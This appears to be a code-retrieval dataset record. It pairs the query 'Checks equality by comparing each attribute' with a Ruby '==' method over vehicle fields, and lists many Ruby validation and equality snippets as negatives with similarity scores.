"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"vnic.FcIf\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"vnic.FcIf\"])\n return false unless object_type_validator.valid?(@object_type)\n return false if !@name.nil? && @name.to_s.length > 31\n return false if !@name.nil? && @name !~ Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n return false if !@static_wwpn_address.nil? && @static_wwpn_address !~ Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n type_validator = EnumAttributeValidator.new('String', [\"fc-initiator\", \"fc-nvme-initiator\", \"fc-nvme-target\", \"fc-target\"])\n return false unless type_validator.valid?(@type)\n return false if !@wwpn.nil? && @wwpn !~ Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n wwpn_address_type_validator = EnumAttributeValidator.new('String', [\"POOL\", \"STATIC\"])\n return false unless wwpn_address_type_validator.valid?(@wwpn_address_type)\n true && super\n end",
"def valid?\n validate_survivors and validate_items && validate_records\n end",
"def valid?\n return false if @id.nil?\n return false if @next_send.nil?\n return false if @rrule.nil?\n return false if @session.nil?\n return false if @last_sent.nil?\n return false if @contact_name.nil?\n return false if @parameters.nil?\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['Once', 'Hourly', 'Daily', 'Weekly', 'Monthly', 'Yearly'])\n return false unless type_validator.valid?(@type)\n return false if @summary.nil?\n return false if @text_parameters.nil?\n return false if @first_occurrence.nil?\n return false if @last_occurrence.nil?\n return false if @recipients_count.nil?\n return false if @timezone.nil?\n return false if @completed.nil?\n return false if @avatar.nil?\n return false if @created_at.nil?\n true\n end",
"def valid?\n return false if !@description.nil? && @description.to_s.length > 255\n return false if @routing_number.nil?\n return false if @routing_number.to_s.length > 9\n return false if @routing_number.to_s.length < 9\n return false if @account_number.nil?\n return false if @account_number.to_s.length > 17\n return false if @account_type.nil?\n account_type_validator = EnumAttributeValidator.new('String', [\"company\", \"individual\"])\n return false unless account_type_validator.valid?(@account_type)\n return false if @signatory.nil?\n return false if @signatory.to_s.length > 30\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^bank_[a-zA-Z0-9]+$/)\n return false if !@signature_url.nil? && @signature_url !~ Regexp.new(/^https:\\/\\/lob-assets\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if @date_created.nil?\n return false if @date_modified.nil?\n return false if @object.nil?\n object_validator = EnumAttributeValidator.new('String', [\"bank_account\"])\n return false unless object_validator.valid?(@object)\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @account_id.nil?\n return false if @organization_id.nil?\n return false if @product_id.nil?\n return false if @product_rate_plan_id.nil?\n return false if @name.nil?\n type_validator = EnumAttributeValidator.new('String', [\"Subscription\", \"FixedTerm\", \"Trial\"])\n return false unless type_validator.valid?(@type)\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"Trial\", \"Provisioned\", \"Paid\", \"AwaitingPayment\", \"Cancelled\", \"Failed\", \"Expired\"])\n return false unless state_validator.valid?(@state)\n return false if @initial_period_start.nil?\n return false if @trial_end.nil?\n managed_by_validator = EnumAttributeValidator.new('String', [\"BillForward\", \"Stripe\"])\n return false unless managed_by_validator.valid?(@managed_by)\n return false if @version_start.nil?\n return false if @version_number.nil?\n return false if @current_time.nil?\n failed_payment_behaviour_validator = EnumAttributeValidator.new('String', [\"CancelSubscription\", \"None\"])\n return false unless failed_payment_behaviour_validator.valid?(@failed_payment_behaviour)\n return true\n end",
"def validate_fields\n %w[email author].each do |field|\n value = self.send(field)\n abort \"Hoe #{field} value not set. aborting\" if value.nil? or value.empty?\n end\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length < 1\n return false if @timezone.nil?\n return false if @timezone.to_s.length < 1\n return false if @currency.nil?\n return false if @currency.to_s.length < 1\n case_sensitivity_validator = EnumAttributeValidator.new('String', [\"sensitive\", \"insensitive-uppercase\", \"insensitive-lowercase\"])\n return false unless case_sensitivity_validator.valid?(@case_sensitivity)\n campaign_priority_validator = EnumAttributeValidator.new('String', [\"universal\", \"stackable\", \"exclusive\"])\n return false unless campaign_priority_validator.valid?(@campaign_priority)\n exclusive_campaigns_strategy_validator = EnumAttributeValidator.new('String', [\"listOrder\", \"lowestDiscount\", \"highestDiscount\"])\n return false unless exclusive_campaigns_strategy_validator.valid?(@exclusive_campaigns_strategy)\n default_discount_scope_validator = EnumAttributeValidator.new('String', [\"sessionTotal\", \"cartItems\", \"additionalCosts\"])\n return false unless default_discount_scope_validator.valid?(@default_discount_scope)\n default_discount_additional_cost_per_item_scope_validator = EnumAttributeValidator.new('String', [\"price\", \"itemTotal\", \"additionalCosts\"])\n return false unless default_discount_additional_cost_per_item_scope_validator.valid?(@default_discount_additional_cost_per_item_scope)\n true\n end",
"def valid?\n run_validation\n @errors.empty?\n end",
"def valid?\n MANDATORY_ATTRIBUTES.each{|a| return false unless self[a]}\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @token.nil?\n return false if @tipo.nil?\n tipo_validator = EnumAttributeValidator.new('String', ['fatture', 'proforma', 'ordini', 'preventivi', 'ndc'])\n return false unless tipo_validator.valid?(@tipo)\n return false if @nome.nil?\n return false if @indirizzo_via.nil?\n return false if @indirizzo_cap.nil?\n return false if @indirizzo_citta.nil?\n return false if @indirizzo_provincia.nil?\n return false if @paese.nil?\n lingua_validator = EnumAttributeValidator.new('String', ['it', 'en', 'de'])\n return false unless lingua_validator.valid?(@lingua)\n return false if @piva.nil?\n return false if @cf.nil?\n return false if @numero.nil?\n return false if @valuta.nil?\n return false if @valuta_cambio.nil?\n return false if @prezzi_ivati.nil?\n return false if @importo_netto.nil?\n return false if @importo_iva.nil?\n return false if @importo_totale.nil?\n mostra_totali_validator = EnumAttributeValidator.new('String', ['tutti', 'netto', 'nessuno'])\n return false unless mostra_totali_validator.valid?(@mostra_totali)\n return false if @lista_articoli.nil?\n pa_tipo_cliente_validator = EnumAttributeValidator.new('String', ['PA', 'B2B'])\n return false unless pa_tipo_cliente_validator.valid?(@pa_tipo_cliente)\n pa_tipo_validator = EnumAttributeValidator.new('String', ['ordine', 'convenzione', 'contratto', 'nessuno'])\n return false unless pa_tipo_validator.valid?(@pa_tipo)\n pa_esigibilita_validator = EnumAttributeValidator.new('String', ['I', 'D', 'S', 'N'])\n return false unless pa_esigibilita_validator.valid?(@pa_esigibilita)\n true\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @prefix_suffix_option.nil?\n prefix_suffix_option_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_option_validator.valid?(@prefix_suffix_option)\n return false if !@invoice_pre_suffix.nil? && @invoice_pre_suffix.to_s.length > 5\n application_units_validator = EnumAttributeValidator.new('String', [\"Amount\", \"Hours\", \"Incidents\"])\n return false unless application_units_validator.valid?(@application_units)\n application_cycle_validator = EnumAttributeValidator.new('String', [\"Contract2Weeks\", \"Contract4Weeks\", \"ContractYear\", \"CalendarMonth\", \"CalendarQuarter\", \"CalendarWeek\", \"ContractQuarter\", \"CalendarYear\"])\n return false unless application_cycle_validator.valid?(@application_cycle)\n return false if @employee_comp_rate.nil?\n employee_comp_rate_validator = EnumAttributeValidator.new('String', [\"Actual\", \"Hourly\"])\n return false unless employee_comp_rate_validator.valid?(@employee_comp_rate)\n return false if @employee_comp_not_exceed.nil?\n employee_comp_not_exceed_validator = EnumAttributeValidator.new('String', [\"Billing\", \"Percent\", \"Amount\"])\n return false unless employee_comp_not_exceed_validator.valid?(@employee_comp_not_exceed)\n return false if @invoicing_cycle.nil?\n invoicing_cycle_validator = EnumAttributeValidator.new('String', [\"CalendarYear\", \"ContractYear\"])\n return false unless invoicing_cycle_validator.valid?(@invoicing_cycle)\n return false if !@invoice_description.nil? && @invoice_description.to_s.length > 4000\n return false if @bill_time.nil?\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n return false if @bill_expenses.nil?\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n return false if @bill_products.nil?\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n return true\n end",
"def validate\n end",
"def valid?\n return false if @to.nil?\n return false if @from.nil?\n carrier_validator = EnumAttributeValidator.new('String', [\"USPS\"])\n return false unless carrier_validator.valid?(@carrier)\n return false if @date_created.nil?\n return false if @date_modified.nil?\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^ltr_[a-zA-Z0-9]+$/)\n return false if !@template_id.nil? && @template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@template_version_id.nil? && @template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n return false if !@url.nil? && @url !~ Regexp.new(/^https:\\/\\/(lob-assets|lob-assets-staging)\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if @object.nil?\n object_validator = EnumAttributeValidator.new('String', [\"letter\"])\n return false unless object_validator.valid?(@object)\n return false if !@description.nil? && @description.to_s.length > 255\n return false if !@tracking_events.nil? && @tracking_events.length > 0\n address_placement_validator = EnumAttributeValidator.new('String', [\"top_first_page\", \"insert_blank_page\", \"bottom_first_page_center\", \"bottom_first_page\"])\n return false unless address_placement_validator.valid?(@address_placement)\n true\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def supports_validations?\n true\n end",
"def valid?\n @errors = self.class.valid_against_schema?(self.class.json_schema, self)\n @errors.empty?\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n end",
"def valid?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@last_name.nil? && @last_name.to_s.length > 30\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@country.nil? && @country.to_s.length > 50\n return false if !@security_identifier.nil? && @security_identifier.to_s.length > 184\n return false if !@title.nil? && @title.to_s.length > 100\n return false if !@school.nil? && @school.to_s.length > 50\n return false if !@nick_name.nil? && @nick_name.to_s.length > 30\n return false if !@significant_other.nil? && @significant_other.to_s.length > 30\n return false if !@portal_password.nil? && @portal_password.to_s.length > 15\n return false if !@portal_security_level.nil? && @portal_security_level > 6.0\n return false if !@portal_security_level.nil? && @portal_security_level < 1.0\n gender_validator = EnumAttributeValidator.new('String', [\"Male\", \"Female\"])\n return false unless gender_validator.valid?(@gender)\n presence_validator = EnumAttributeValidator.new('String', [\"Online\", \"DoNotDisturb\", \"Away\", \"Offline\", \"NoAgent\"])\n return false unless presence_validator.valid?(@presence)\n return true\n end",
"def validated?; end",
"def valid?\n return false if @name.nil?\n return false if @slug.nil?\n return false if @status.nil?\n status_validator = EnumAttributeValidator.new('String', ['enabled', 'disabled'])\n return false unless status_validator.valid?(@status)\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['digital', 'physical'])\n return false unless type_validator.valid?(@type)\n return false if @sku.nil?\n return false if @price.nil?\n availability_validator = EnumAttributeValidator.new('String', ['available', 'comingSoon', 'retired'])\n return false unless availability_validator.valid?(@availability)\n stock_status_validator = EnumAttributeValidator.new('String', ['available', 'alert', 'unavailable'])\n return false unless stock_status_validator.valid?(@stock_status)\n return false if @categories.nil?\n true\n end",
"def valid?\n self.valid\n end"
] |
[
"0.78992486",
"0.78992486",
"0.70971805",
"0.70782334",
"0.7032205",
"0.7031276",
"0.69510347",
"0.6869891",
"0.6858077",
"0.6858077",
"0.68287027",
"0.6823878",
"0.6820306",
"0.68144894",
"0.6794656",
"0.6752167",
"0.66843414",
"0.6676546",
"0.6667755",
"0.66296124",
"0.66184515",
"0.6608204",
"0.6599208",
"0.6594276",
"0.6584302",
"0.6580472",
"0.6578095",
"0.6558585",
"0.6555879",
"0.6542414",
"0.6536983",
"0.6533884",
"0.65315515",
"0.65311855",
"0.65267456",
"0.65258855",
"0.6520786",
"0.65205675",
"0.6511026",
"0.6498394",
"0.64966303",
"0.64935124",
"0.6491113",
"0.64885867",
"0.6479024",
"0.6473706",
"0.64679337",
"0.6467217",
"0.6461245",
"0.64601135",
"0.64553183",
"0.64540446",
"0.6447954",
"0.64393955",
"0.6434162",
"0.64312094",
"0.6428205",
"0.6426148",
"0.6412439",
"0.64070046",
"0.64044213",
"0.6403482",
"0.6399368",
"0.63979715",
"0.63858813",
"0.63855004",
"0.63855004",
"0.63855004",
"0.63855004",
"0.63740236",
"0.6367379",
"0.63645166",
"0.6362151",
"0.63599974",
"0.6357385",
"0.63549066",
"0.63549066",
"0.63549066",
"0.63549066",
"0.6354845",
"0.6354207",
"0.6350302",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.63435715",
"0.63406414",
"0.63344824",
"0.6333158",
"0.63313466",
"0.63294095",
"0.6327076"
] |
0.0
|
-1
|
Checks equality by comparing each attribute.
|
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
year == o.year &&
make == o.make &&
model == o.model &&
trim == o.trim &&
short_trim == o.short_trim &&
body_type == o.body_type &&
body_subtype == o.body_subtype &&
vehicle_type == o.vehicle_type &&
transmission == o.transmission &&
drivetrain == o.drivetrain &&
fuel_type == o.fuel_type &&
engine == o.engine &&
engine_size == o.engine_size &&
engine_block == o.engine_block &&
doors == o.doors &&
cylinders == o.cylinders &&
made_in == o.made_in &&
steering_type == o.steering_type &&
antibrake_sys == o.antibrake_sys &&
tank_size == o.tank_size &&
overall_height == o.overall_height &&
overall_length == o.overall_length &&
overall_width == o.overall_width &&
std_seating == o.std_seating &&
opt_seating == o.opt_seating &&
highway_miles == o.highway_miles &&
city_miles == o.city_miles &&
engine_measure == o.engine_measure &&
engine_aspiration == o.engine_aspiration &&
trim_r == o.trim_r
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ==(other)\n attributes == other.attributes\n end",
"def ==(other) # :nodoc:\n @attrs == other.attrs\n end",
"def eql?(other)\n return true if self == other\n @@ATTRIBUTES.each do |att|\n return false unless self.send(att).eql?(other.send(att))\n end\n true\n end",
"def assert_equal_attributes(object, expected_attributes)\n expected_attributes.each do |index, value|\n assert_equal value, object[index], \"#{index}\"\n end\n end",
"def attr_equal?(o)\n self == o and\n self.instance_variables_compare(o).empty? and\n self.attributes == o.attributes\n end",
"def same_attributes?(spec)\n @@attributes.all? {|name, default| self.send(name) == spec.send(name) }\n end",
"def ==(other)\n self.class.valid_attrs.each do |attr|\n return false if read(attr) != other.read(attr)\n end\n true\n end",
"def ==(other)\n self.attributes == (other.respond(:attributes) || {} )\n end",
"def ==(other)\n other.present? && self.attributes == other.attributes\n end",
"def ==(other)\n return false if other.nil? || !other.respond_to?(:attributes)\n attributes == other.attributes\n end",
"def match?(attributes)\n attributes.each do |attr, val|\n return false if send(attr).to_s != val.to_s\n end\n true\n end",
"def ==(other)\n self.class == other.class &&\n self.attributes == other.attributes\n end",
"def ==(other)\n self.class == other.class &&\n attributes == other.attributes\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.send(name) }\n end",
"def changed?(comparison)\n attributes.any? do |attribute, value|\n next unless comparison.key?(attribute)\n comparison[attribute] != value\n end\n end",
"def ==(other)\n return false unless self.class == other.class\n self.attributes == other.attributes\n end",
"def ==(other)\n if other.kind_of? Details::Attribute\n self.name == other.name && self.value == other.value\n else\n self.value == other\n end\n end",
"def ==(other)\n return false unless other.instance_of? self.class\n attributes == other.attributes\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n Attribute === other && \n !(Expression === other) &&\n relation == other.relation && \n name == other.name && \n self.alias == other.alias && \n original_relation == other.original_relation\n end",
"def ==(obj)\n if obj.instance_of?(self.class)\n compare_attributes = [\"category_id\", \"combo_item_id\", \"quantity\", \"sequence\"]\n compare_attributes.each do |field|\n if self.send(field) != obj.send(field)\n return false\n end\n end\n return true\n end\n return false\n end",
"def ==(other)\n return false if other.class != self.class\n attr_hash == other.attr_hash\n end",
"def ==(other)\n case other\n when Chair::Row\n @attributes == other.instance_variable_get('@attributes')\n when Array\n @attributes.values == other\n else false\n end\n end",
"def == other\n return false unless other.kind_of? self.class\n attribute_of.all? do |key, val|\n val.get == other.__send__(key)\n end\n end",
"def correct_combination?(attr1, attr2, attr3)\n result = false\n if attr1 == attr2 && attr2 == attr3\n result = true\n elsif attr1 != attr2 && attr2 != attr3 && attr1 != attr3\n result = true\n end\n return result\n end",
"def ==(other)\n return false if self.class != other.class\n return super if @_lazer_model.required_properties.empty?\n @_lazer_model.required_properties.each do |key_name|\n return false if read_attribute(key_name) != other.read_attribute(key_name)\n end\n true\n end",
"def eql?(other)\n other.is_a?(self.class) && !self.class.comparison_attrs.find{|a| send(a) != other.send(a)}\n end",
"def verify_attributes(hash, expected)\n return [] unless expected.attributes\n expected.attributes.map{ |a| verify_attribute_value(hash[a.name.to_s], a) }\n end",
"def assert_attributes obj, attr_hash\n default_attr_hash = {}\n if obj.respond_to? :default_attr_hash\n default_attr_hash = obj.default_attr_hash\n end\n default_attr_hash.merge(attr_hash).each_pair do |key, value|\n assert_equal value, obj.__send__(key), \"Attribute #{key} of #{obj}\"\n end\n end",
"def match_attributes(attrs)\n attrs = Saxxy::Helpers.stringify_keys(attrs)\n attributes.reduce(true) do |b, (k, v)|\n value = attrs[k]\n b && ((!value.nil? && match(v, value)) || (v.nil? && value.nil?))\n end\n end",
"def equal_set(expected)\n message = \"#{Helpers.inspect_records(@object)} has the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id).sort\n right = expected.map(&:id).sort\n \n test_case.assert(left != right, message)\n end",
"def ===(other)\n required = self.class.required_attributes\n\n other.respond_to?(:keys) && (common = other.keys & required) &&\n common.size == other.keys.size && common.size == required.size\n end",
"def bt_same_value?(other)\n bt_value_attributes == other.bt_value_attributes\n end",
"def ==(x)\n return true if object_id == x.object_id\n return false unless x.kind_of?(AttrArray)\n each_with_index do |a, n|\n return false unless a == x[n]\n end\n true\n end",
"def equal_set(expected)\n message = \"#{Helpers.inspect_records(@object)} does not have the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id).sort\n right = expected.map(&:id).sort\n \n test_case.assert(left == right, message)\n end",
"def compare_attributes(data_criteria, criteria)\n return false unless data_criteria['dataElementAttributes']&.any?\n\n data_criteria['dataElementAttributes'].map { |dc| dc.except('_id') }.include? criteria['dataElementAttributes'][attribute_index].except('_id')\n end",
"def ==(other)\n @klass == other.class && @attributes == strip_active_record(other)\n end",
"def ==(other)\n other.is_a?(self.class) &&\n other.attribute == attribute &&\n other.validation == validation &&\n other.expected == expected &&\n other.actual == actual\n end",
"def == other\n return false unless self.class == other.class\n [:unit, :frequency, :anchor, :weeks, :monthdays, :weekdays, :times].all? do |attribute|\n self.send(attribute) == other.send(attribute)\n end\n end",
"def compare_equal?(item, line_item)\n ![\n :ax_account_number,\n :ax_account_id,\n :ax_order_number,\n :ax_order_id,\n :email_address,\n :first_name,\n :last_name,\n :serial_number,\n :purch_order_form_num\n ].detect { |attr| item.send(attr) != line_item.send(attr) }\n end",
"def ==(b) # :nodoc:\n ( b.respond_to?(:result_attributes) &&\n result_attributes == b.result_attributes && \n @result_attributes.all?{ |k| send(k) == b.send(k) } )\n end",
"def validates_different(*attr_names)\n validates_with ValidatesAll::DifferenceValidator, _merge_attributes(attr_names)\n end",
"def identical?\n #Song.first.attributes.each { |v,k| Song.find(:all, :conditions => [\" #{v} like ?\", \"%blah%\"])}\n Song.find(:all, :conditions => [\"name = ? or length = ?\", \"#{self.name}\", self.length]) do |x| \n x.hash == self.hash\n end\n end",
"def diff?(model = self.class.find(id))\n self.class.diffable_attributes.each do |attribute|\n return true if send(attribute) != model.send(attribute)\n end\n return false\n end",
"def filter_attributes_match?(hash_one, hash_two)\n hash_one.all? do |key, value_one|\n value_two = hash_two[key]\n case\n when value_one == value_two\n true\n when value_one.is_a?(Hash) && value_two.is_a?(Hash)\n filter_attributes_match?(value_one, value_two)\n when hash_one[key].to_s == hash_two[key].to_s\n true\n when value_one.is_a?(String) && value_one.start_with?(\"eval:\")\n eval_attribute_value(value_one, value_two)\n else\n false\n end\n end\n end",
"def comparable_attributes\n#\t\tHashWithIndifferentAccess[attributes.select {|k,v| \n#\t\t\t!Abstract.incomparable_attribute_names.include?(k)}]\n\t\tHashWithIndifferentAccess[attributes.select {|k,v| db_fields.include?(k)}]\n\tend",
"def all_equal?\n a = self.first\n all? { |b| a == b }\n end",
"def check_attrs(attr_list)\r\n attrs = []\r\n attr_list.each do |attr_sym|\r\n attr = assigns(attr_sym.to_sym)\r\n assert_not_nil attr, \"Attribute @#{attr_sym} should not be nil\"\r\n assert !attr.new_record?, \"Should have saved the @#{attr_sym} obj\" if attr.class == ActiveRecord\r\n attrs << attr\r\n end\r\n attrs.length > 1 ? attrs : attrs[0]\r\n end",
"def check_attrs(attr_list)\r\n attrs = []\r\n attr_list.each do |attr_sym|\r\n attr = assigns(attr_sym.to_sym)\r\n assert_not_nil attr, \"Attribute @#{attr_sym} should not be nil\"\r\n assert !attr.new_record?, \"Should have saved the @#{attr_sym} obj\" if attr.class == ActiveRecord\r\n attrs << attr\r\n end\r\n attrs.length > 1 ? attrs : attrs[0]\r\n end",
"def attr_set?(cards, attr)\n array = []\n cards.each do |card|\n # evalutes the string 'attr' and returns the value\n array << card.send(attr)\n end\n\n # only return true if it's all the same or totally different\n return true if array.uniq.count == 1\n return true if array.uniq.count == 3\n return false\n end",
"def attribute_changed?(attribute_name)\n (self.diff['attributes']['new']||{})[attribute] != (self.diff['attributes']['old']||{})[attribute]\n end",
"def eql?(other)\n return false if (other.nil? or self.class != other.class)\n return false unless super(other)\n return false unless self.attributes == other.attributes\n return false unless self.nodes == other.nodes\n true\n end",
"def eql?(other)\n return false unless self.class == other.class\n self.key_attributes == other.key_attributes\n end",
"def uniquify_attributes(attributes)\n attributes.each do |ka|\n oldval = send(ka)\n next unless String === oldval\n newval = UniquifierCache.instance.get(self, oldval)\n set_property_value(ka, newval)\n logger.debug { \"Reset #{qp} #{ka} from #{oldval} to unique value #{newval}.\" }\n end\n end",
"def eql?(object)\n self.class.equal?(object.class) && attributes == object.attributes\n end",
"def multi_element_attr_check( elements )\n wanted = Array.new\n found = Array.new\n elements.each do |element|\n print \".\"\n e = $driver.find_element(element[0].to_sym, element[1])\n wanted << [ element[1], element[2], element[3] ]\n found << [ element[1], element[2], e.attribute(element[2]) ]\n end\n\n found.should == wanted\n end",
"def equals(rule)\n element == rule.element && attributes == rule.attributes\n end",
"def attr_reader(*args)\n super\n comparison_attrs.concat(args)\n end",
"def xml_nodes_match_attrs(xml_nodes, attrs, mismatches = [])\n attrs.each_with_index.each { |attr_set, idx|\n xn = xml_nodes[idx]\n attr_set.each { |(attr_key, attr_val)|\n # Either call method, or hash key, or recurse on children\n # p.name vs. p[:name]\n if :children == attr_key\n # recurse over children\n xml_nodes_match_attrs(xn.children, attr_val, mismatches)\n else\n # compare attrs\n xn_val = xn.methods.include?(attr_key) ? xn.send(attr_key) : xn[attr_key]\n if xn_val != attr_val\n mismatches << { node: xn.name_and_class_path, attr: \"#{ attr_key }: expected #{ attr_val.inspect }, got #{ xn_val.inspect }\" }\n end\n end\n }\n }\n mismatches\n end",
"def matches_state_attrs?\n @expected_attrs == state_attrs\n end",
"def equal_list(expected)\n message = \"#{Helpers.inspect_records(@object)} has the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id)\n right = expected.map(&:id)\n \n test_case.assert(left != right, message)\n end",
"def eql?(other)\n return false unless super(other)\n return false unless attributes == other.attributes\n return false unless content == other.content\n\n true\n end",
"def ==(other)\n return true if other.equal?(self)\n return false unless other.instance_of?(self.class)\n\n self.class.attributes.inject(true) do |memo, attribute|\n attribute_name = attribute.first\n attribute_type = attribute.last[:type]\n\n # Skip associations\n if attribute_type.include?(LazyResource::Resource) || (attribute_type.is_a?(::Array) && attribute_type.first.include?(LazyResource::Resource))\n memo\n else\n memo && self.send(:\"#{attribute_name}\") == other.send(:\"#{attribute_name}\")\n end\n end\n end",
"def matches? item, attributes\n\n attributes.map { |attribute, value|\n\n item.send(attribute) == value\n\n }.flatten == [true]\n\n end",
"def ==( other ) \n\t\t\tcomparison_attributes = lambda{ |area| [ area.area_desc, area.altitude, area.ceiling, area.circles, area.geocodes, area.polygons ]}\n\t\t\tcomparison_attributes.call( self ) == comparison_attributes.call( other )\n\t\tend",
"def all_obs_same_attr?(observations, attr)\n exemplar = observations.first.send(attr)\n observations.all? { |o| o.send(attr) == exemplar }\n end",
"def eql?(*) end",
"def eql?(other)\n return true if equal?(other)\n return false unless self == other\n [:id, :fide_id, :rating, :fide_rating, :title, :gender].each do |m|\n return false if self.send(m) && other.send(m) && self.send(m) != other.send(m)\n end\n true\n end",
"def match\n @matches = attributes_enumerator.map do |(type, value), index|\n attribute_name = self.class.names[index]\n attributes.store(\n attribute_name, type.match(value, context: @context.dup)\n )\n end\n return if (failures = @matches.select(&:invalid?)).empty?\n failures.unshift(failure).reduce(:merge!)\n end",
"def ==(val)\n if val.is_a?(Model)\n # Use normal comparison for a model\n super\n else\n # Compare to attributes otherwise\n attributes == val\n end\n end",
"def ==(o)\n return true if self.equal?(o)\n self.class == o.class &&\n attribute == o.attribute &&\n statistics == o.statistics &&\n other == o.other &&\n total == o.total &&\n missing == o.missing &&\n term_count == o.term_count &&\n term_type == o.term_type &&\n terms == o.terms\n end",
"def ==(*several_variants)\n #This is a stub, used for indexing\n end",
"def is_equal?(a)\n @amount == a.amount && @code == a.code\n end",
"def equal_list(expected)\n message = \"#{Helpers.inspect_records(@object)} does not have the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id)\n right = expected.map(&:id)\n \n test_case.assert(left == right, message)\n end",
"def comparison_attributes\n except_list = ['id', 'updated_at', 'created_at', 'verified_at']\n except_list << 'alternative_phone' unless Spree::Config[:alternative_shipping_phone]\n except_list << 'company' unless Spree::Config[:company]\n\n a = attributes.except(*except_list)\n a.each{|k, v|\n if v.is_a?(String)\n v = v.downcase.strip.gsub(/\\s+/, ' ')\n a[k] = v.present? ? v : nil\n end\n }\n a['state_name'] = nil if a['state_name'].blank?\n a\n end",
"def multi_element_attr_match( elements )\n elements.each do |element|\n print \".\"\n wait_for_element(element[0].to_sym, element[1])\n check_attribute_match(element[0].to_sym, element[1], element[2], element[3])\n end\n end",
"def xml_should_eql(actual, expected)\n same = xml_cmp(actual, expected)\n actual.should.== expected unless same \nend",
